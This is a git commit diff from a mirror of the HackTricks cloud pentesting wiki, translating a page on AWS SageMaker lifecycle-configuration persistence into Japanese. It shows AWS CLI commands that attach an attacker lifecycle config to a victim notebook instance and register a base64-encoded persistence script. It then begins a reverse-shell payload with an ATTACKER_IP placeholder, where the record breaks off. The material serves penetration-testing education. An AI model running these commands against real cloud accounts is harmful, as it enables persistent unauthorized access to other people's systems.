mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-27 21:23:07 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sagem
This commit is contained in:
@@ -38,9 +38,9 @@ aws sagemaker update-notebook-instance \
|
||||
--notebook-instance-name victim-instance \
|
||||
--lifecycle-config-name attacker-lcc
|
||||
```
|
||||
## SageMaker Studioでライフサイクル設定を行う
|
||||
## SageMaker Studioでライフサイクル構成を設定する
|
||||
|
||||
ライフサイクル設定は、SageMaker Studio内のさまざまなレベルおよび異なるアプリタイプに添付できます。
|
||||
ライフサイクル構成は、SageMaker Studio内のさまざまなレベルおよび異なるアプリタイプに添付できます。
|
||||
|
||||
### スタジオドメインレベル(すべてのユーザー)
|
||||
```bash
|
||||
@@ -100,16 +100,16 @@ aws sagemaker create-studio-lifecycle-config \
|
||||
--studio-lifecycle-config-app-type CodeEditor \
|
||||
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
|
||||
```
|
||||
### Critical Info:
|
||||
### 重要な情報:
|
||||
* ドメインまたはスペースレベルでLCCをアタッチすると、スコープ内のすべてのユーザーまたはアプリケーションに影響を与えます。
|
||||
* より高い権限が必要です(sagemaker:UpdateDomain、sagemaker:UpdateSpace)、通常はドメインレベルよりもスペースレベルで実現可能です。
|
||||
* ネットワークレベルの制御(例:厳格な出口フィルタリング)は、成功したリバースシェルやデータの流出を防ぐことができます。
|
||||
|
||||
## Reverse Shell via Lifecycle Configuration
|
||||
## ライフサイクル構成を介したリバースシェル
|
||||
|
||||
SageMaker Lifecycle Configurations (LCCs) execute custom scripts when notebook instances start. An attacker with permissions can establish a persistent reverse shell.
|
||||
SageMakerライフサイクル構成(LCC)は、ノートブックインスタンスが起動するときにカスタムスクリプトを実行します。権限を持つ攻撃者は、持続的なリバースシェルを確立できます。
|
||||
|
||||
### Payload Example:
|
||||
### ペイロードの例:
|
||||
```
|
||||
#!/bin/bash
|
||||
ATTACKER_IP="<ATTACKER_IP>"
|
||||
|
||||
Reference in New Issue
Block a user